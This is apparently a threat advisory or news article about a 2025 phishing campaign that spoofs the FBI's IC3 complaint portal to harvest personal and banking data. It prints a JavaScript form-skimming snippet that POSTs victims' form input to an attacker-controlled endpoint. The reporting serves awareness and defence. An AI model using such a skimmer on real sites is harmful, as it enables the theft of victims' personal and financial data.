Cybersecurity
A spoofing campaign targeting the Federal Bureau of Investigation’s Internet Crime Complaint Center (IC3) has been identified. Starting mid-September 2025, access attempts to IC3’s official portal redirected users to fraudulent domains mimicking the legitimate site.
The impersonators utilized URLs resembling the original, such as “ic3-gov.com” and “ic3gov.org,” incorporating authentic branding elements like the FBI seal and IC3 banner. Personal data entered by visitors was harvested for identity theft and financial fraud.
IC3 analysts detected these fraudulent sites on September 18, 2025. Visitors reported receiving deceptive emails falsely confirming IC3 report submissions, which linked to cloned pages demanding extensive personally identifiable information (PII).
The campaign’s payload exfiltrated all form data to attacker-controlled servers. IC3 researchers observed that the spoofed infrastructure was hosted with bulletproof providers, allowing rapid domain rotation and minimal takedown potential.
Victims unknowingly provided names, addresses, phone numbers, email credentials, Social Security numbers, and banking details, transmitted in clear text over HTTP. Some cloned pages contained additional JavaScript modules capturing keystrokes and cookies.
Infection Mechanism and Data Harvesting
The malicious sites employed phishing and client-side scripting. A JavaScript snippet intercepted form submissions, rerouting user inputs to an exfiltration endpoint, then proceeded or showed a generic error.
document.querySelector('form#complaintForm').addEventListener('submit', function(evt) {
evt.preventDefault();
var formData = new FormData(this);
fetch('https://malicious-ic3[.]net/collect', {
method: 'POST',
body: formData
}).then(() => this.submit());
});This method captures data without alerting victims, logging keystrokes via an injected listener on all input fields. Traditional antivirus solutions struggle to detect this threat due to its HTML embedding.
Network analysis confirmed successful data exfiltration through repeated POST requests to the malicious domain. Professionals are advised to verify URLs, ensure HTTPS with a valid .gov certificate, and report suspicious IC3-branded pages to the FBI.
